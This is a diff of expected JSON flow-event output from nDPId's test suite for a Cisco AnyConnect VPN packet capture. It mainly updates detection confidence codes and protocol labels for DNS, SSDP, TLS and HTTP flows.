-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267800,"flow_last_seen":1569687267818,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":331,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59582,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687268747,"flow_last_seen":1569687268747,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":50081,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267800,"flow_last_seen":1569687267818,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":331,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59582,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687268747,"flow_last_seen":1569687268747,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":50081,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267841,"flow_last_seen":1569687288158,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.103.196","src_port":56871,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267841,"flow_last_seen":1569687288158,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.103.196","src_port":56871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687270740,"flow_last_seen":1569687270740,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":48166,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00907{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569687245379,"flow_last_seen":1569687245725,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8058,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00908{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1569687245688,"flow_last_seen":1569687268830,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22452,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -01030{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":92,"flow_first_seen":1569687267035,"flow_last_seen":1569687288923,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21688,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687270740,"flow_last_seen":1569687270740,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":48166,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00907{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569687245379,"flow_last_seen":1569687245725,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8058,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00908{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1569687245688,"flow_last_seen":1569687268830,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22452,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +01030{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":92,"flow_first_seen":1569687267035,"flow_last_seen":1569687288923,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21688,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267988,"flow_last_seen":1569687268026,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"74.125.197.188","src_port":56874,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267988,"flow_last_seen":1569687268026,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"74.125.197.188","src_port":56874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1569687245576,"flow_last_seen":1569687267323,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":33,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -374,39 +375,39 @@ 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687241064,"flow_last_seen":1569687246096,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56916,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1569687267453,"flow_last_seen":1569687288697,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56866,"dst_port":8060,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1569687267453,"flow_last_seen":1569687288697,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56866,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1569687269561,"flow_last_seen":1569687269570,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1195,"flow_tot_l4_payload_len":1446,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"CiscoVPN.HTTP","breed":"Acceptable","category":"Web"}} -00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1569687246982,"flow_last_seen":1569687272377,"flow_idle_time":200000,"flow_min_l4_payload_len":90,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":1070,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267831,"flow_last_seen":1569687267847,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00927{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1569687269562,"flow_last_seen":1569687273580,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1140,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56955,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1569687269561,"flow_last_seen":1569687269570,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1195,"flow_tot_l4_payload_len":1446,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"CiscoVPN.HTTP","breed":"Acceptable","category":"Web"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1569687246982,"flow_last_seen":1569687272377,"flow_idle_time":200000,"flow_min_l4_payload_len":90,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":1070,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267831,"flow_last_seen":1569687267847,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00927{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1569687269562,"flow_last_seen":1569687273580,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1140,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56955,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569687269094,"flow_last_seen":1569687286632,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.1","src_port":52595,"dst_port":192,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569687269094,"flow_last_seen":1569687286632,"flow_idle_time":200000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.1","src_port":52595,"dst_port":192,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267805,"flow_last_seen":1569687267824,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64193,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267851,"flow_last_seen":1569687267865,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":58074,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1569687256018,"flow_last_seen":1569687267492,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":787,"flow_tot_l4_payload_len":3023,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687268077,"flow_last_seen":1569687268077,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":38616,"dst_port":61328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267805,"flow_last_seen":1569687267824,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64193,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267851,"flow_last_seen":1569687267865,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":58074,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1569687256018,"flow_last_seen":1569687267492,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":787,"flow_tot_l4_payload_len":3023,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Slack","breed":"Acceptable","category":"Collaborative"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687268077,"flow_last_seen":1569687268077,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":38616,"dst_port":61328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687262866,"flow_last_seen":1569687262912,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":366,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"162.222.43.153","src_port":56881,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 